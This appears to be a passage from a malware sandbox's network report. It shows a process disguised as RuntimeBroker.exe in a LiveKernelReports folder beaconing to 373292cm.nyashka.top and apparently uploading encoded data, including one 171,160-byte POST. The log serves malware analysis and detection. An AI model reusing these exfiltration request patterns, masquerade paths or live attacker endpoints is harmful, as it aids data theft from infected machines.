                                                                                  Jan 11, 2025 06:43:32.890387058 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:33.023919106 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:32 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  15 | 192.168.2.6 | 56996 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:33.191212893 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:33.535810947 CET | 2544 | OUT | Data: request body
                                                                                  Jan 11, 2025 06:43:33.820041895 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:33.985991955 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  16 | 192.168.2.6 | 57002 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:34.058068991 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1852
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  17 | 192.168.2.6 | 57007 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:34.214401007 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:34.570993900 CET | 2536 | OUT | Data: request body
                                                                                  Jan 11, 2025 06:43:34.861743927 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:34.998178959 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:34 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  18 | 192.168.2.6 | 57013 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:35.135605097 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:35.488943100 CET | 2544 | OUT | Data: request body
                                                                                  Jan 11, 2025 06:43:35.764413118 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:35.894414902 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:35 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  19 | 192.168.2.6 | 57019 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:36.271702051 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:36.629897118 CET | 2544 | OUT | Data: request body
                                                                                  Jan 11, 2025 06:43:36.917495012 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:37.050012112 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:36 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  20 | 192.168.2.6 | 57026 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:37.414597988 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:37.770519018 CET | 2544 | OUT | Data: request body
                                                                                  Jan 11, 2025 06:43:38.040425062 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:38.170429945 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:37 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  21 | 192.168.2.6 | 57036 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:38.348045111 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:38.692085028 CET | 2544 | OUT | Data: request body
                                                                                  Jan 11, 2025 06:43:38.976774931 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:39.106523037 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:38 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  22 | 192.168.2.6 | 57042 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:39.230544090 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  23          192.168.2.6  57043        37.44.238.250   80                6008  C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                  Jan 11, 2025 06:43:39.268450975 CET  281                OUT        POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:39.613997936 CET2544OUTData Raw: 5a 50 5c 53 54 47 51 59 5b 5f 5a 51 59 5f 58 55 57 5e 5d 5b 57 5e 53 5e 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZP\STGQY[_ZQY_XUW^][W^S^\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.^; 'C"$_#V))> Y(=!+-X#,Q42,<:$4/>&F$.Y/
                                                                                  Jan 11, 2025 06:43:39.896876097 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:40.029237032 CET  158                IN         HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:39 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  24          192.168.2.6  57050        37.44.238.250   80                6008  C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                  Jan 11, 2025 06:43:40.562985897 CET  257                OUT        POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:40.911035061 CET2544OUTData Raw: 5f 57 5c 57 54 46 51 5d 5b 5f 5a 51 59 54 58 52 57 5d 5d 5f 57 59 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _W\WTFQ][_ZQYTXRW]]_WYSU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.Y/ "# %)?<!Z<>7Z4Z341+9( 5,&F$.Y/)


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  25          192.168.2.6  57055        37.44.238.250   80                6008  C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                  Jan 11, 2025 06:43:41.162261009 CET  283                OUT        POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 171160
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:41.809174061 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:42.451473951 CET  158                IN         HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  26          192.168.2.6  57059        37.44.238.250   80                6008  C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                  Jan 11, 2025 06:43:41.420749903 CET  281                OUT        POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:41.770231009 CET2544OUTData Raw: 5f 54 59 57 51 47 54 5f 5b 5f 5a 51 59 56 58 51 57 50 5d 52 57 5d 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _TYWQGT_[_ZQYVXQWP]RW]SU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-;;5['4!]=_?=_?;\ P4!(?* %\;>&F$.Y/!
                                                                                  Jan 11, 2025 06:43:42.078850031 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:42.245820999 CET  158                IN         HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  27          192.168.2.6  57060        37.44.238.250   80                6008  C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                  Jan 11, 2025 06:43:42.370186090 CET  257                OUT        POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:42.723362923 CET2544OUTData Raw: 5a 55 5c 5f 54 41 54 58 5b 5f 5a 51 59 5f 58 53 57 5a 5d 59 57 59 53 5d 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZU\_TATX[_ZQY_XSWZ]YWYS]\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-;#,5[;" 2)3<?X <#0P?47 =,&F$.Y/
                                                                                  Jan 11, 2025 06:43:43.008708954 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:43.140379906 CET  158                IN         HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  28          192.168.2.6  57061        37.44.238.250   80                6008  C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                  Jan 11, 2025 06:43:43.276381016 CET  257                OUT        POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:43.629637957 CET2544OUTData Raw: 5f 57 59 55 54 45 54 5c 5b 5f 5a 51 59 55 58 52 57 59 5d 5d 57 5d 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _WYUTET\[_ZQYUXRWY]]W]S_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S./U0!-]71+>0X?.-<>$#Z3 W/+)?X :,>&F$.Y/-
                                                                                  Jan 11, 2025 06:43:43.915575027 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:44.044574022 CET  158                IN         HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:43 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  29          192.168.2.6  57063        37.44.238.250   80                6008  C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                  Jan 11, 2025 06:43:44.189635992 CET  281                OUT        POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  30          192.168.2.6  57064        37.44.238.250   80                6008  C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                  Jan 11, 2025 06:43:44.277412891 CET  281                OUT        POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:44.629692078 CET1872OUTData Raw: 5f 57 5c 5e 54 43 54 5d 5b 5f 5a 51 59 56 58 50 57 5f 5d 52 57 5c 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _W\^TCT][_ZQYVXPW_]RW\SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.\,3!7 *3?-5+.#]#??73<;_7#5;&F$.Y/!
                                                                                  Jan 11, 2025 06:43:44.925116062 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:45.058109999 CET  308                IN         HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:44 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 26 55 3d 1b 2a 5c 31 3b 38 18 25 33 2d 0e 3e 2e 27 5b 29 03 0b 15 27 38 29 5e 27 2e 23 0d 26 3b 00 02 2b 10 29 0a 24 2f 2b 5c 2d 34 2b 5d 0c 13 22 5c 37 14 2d 05 25 12 02 5c 2a 2b 37 5f 20 2f 3a 5b 3f 14 31 50 28 11 23 03 3c 17 3c 01 3c 39 2d 0e 2e 2b 35 15 39 09 39 0c 34 3e 2b 52 0d 11 24 54 28 13 25 54 3e 3e 3f 5c 21 06 3c 03 27 03 22 57 32 0b 3e 1e 30 07 24 1f 25 21 35 51 24 08 3e 09 26 3b 31 01 25 3f 04 0e 23 22 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: &U=*\1;8%3->.'[)'8)^'.#&;+)$/+\-4+]"\7-%\*+7_ /:[?1P(#<<<9-.+5994>+R$T(%T>>?\!<'"W2>0$%!5Q$>&;1%?#"#T,"W3UV


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  31          192.168.2.6  57065        37.44.238.250   80                6008  C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                  Jan 11, 2025 06:43:44.402563095 CET  281                OUT        POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:44.754600048 CET2544OUTData Raw: 5f 56 59 50 54 42 54 5f 5b 5f 5a 51 59 54 58 50 57 5a 5d 5e 57 5f 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _VYPTBT_[_ZQYTXPWZ]^W_S\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.Y/"= 1Y+-#+!([ 7?3V4?()+4V68&F$.Y/)
                                                                                  Jan 11, 2025 06:43:45.037838936 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:45.166389942 CET  158                IN         HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:44 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                  32          192.168.2.6  57066        37.44.238.250   80                6008  C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                  Jan 11, 2025 06:43:45.290443897 CET  257                OUT        POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:45.927762032 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:46.064291954 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:45 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  33 | 192.168.2.6 | 57067 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:46.196674109 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:46.844347954 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:46.978204966 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:46 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  34 | 192.168.2.6 | 57068 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:43:47.113392115 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
